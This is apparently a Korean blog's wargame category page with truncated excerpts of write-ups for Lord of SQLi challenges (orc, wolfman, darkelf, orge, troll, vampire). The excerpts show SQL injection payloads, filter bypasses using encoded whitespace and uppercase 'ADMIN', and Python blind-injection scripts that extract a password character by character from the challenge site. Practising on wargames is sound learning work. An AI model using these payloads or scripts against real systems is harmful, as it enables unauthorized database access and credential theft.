워게임200 vampire single quote 안됨 이번엔 바로 전 문제와 달리 대문자를 소문자로 만들 후 진행한다. 또한 admin을 거른다. 하지만 바로 보인다. 2021. 10. 2. troll 따옴표 안됨 admin 안됨 그래놓고 admin 뚫어내라 이 말이지 삽질하다가 롸업봤는데 이렇게 허무할수가.. preg_match에서는 대소문자를 구별하기 때문에 ADMIN은 걸러지지 않는다. 하지만 MySQL은 대소문자를 구별하지 않기 때문에 admin과 ADMIN은 같다. 2021. 10. 2. orge 1. pw length 구하기 import requests i = 1 while True: url = f"https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)={i}%23" cookies = {"PHPSESSID":""} res = requests.get(url, cookies=cookies) if "Hello admin" in res.text: print('pw length : ',i) break i+=1 2. pw 하나하나 구하기 import requests import threading def req_url(i): cookies =.. 2021. 10. 2. darkelf or and 도 필터링 or는 ||와 같다. 왜 이게 바로 생각이 안났을까 ?pw=' || id='admin'# || -> %7C%7C # -> %23 2021. 10. 2. wolfman prob _ . () 필터링 whitespace 안됨 whitespace 필터링 우회 "sql injection whitespace bypass" 구글링 whitespace(%20) -> %0a %0b %0c %0d %09 그럼 평소 하던대로 ' or id='admin'# '%0aor%0aid='admin'%23 으로 우회하면 된다. 2021. 10. 2. orc 이게 바로 blind sql injection 아예 pw를 알아내야하는 문제 같다.(비박스 책에서 addslashes는 우회할 수 없다고 했다.. 확실X) 1. 비밀번호 길이 알아내기 2. 비밀번호 한 글자씩 알아내기 import requests import threading def req_url(i): cookies={'PHPSESSID':''} for c in range(48, 123): response = requests.get("https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php?pw=' or id='admin' and substr(pw,"+str(i)+",1)=char("+str(c)+")%23",cookies=cookies.. 2021. 10. 1. 이전 1 ··· 19 20 21 22 23 24 25 ··· 34 다음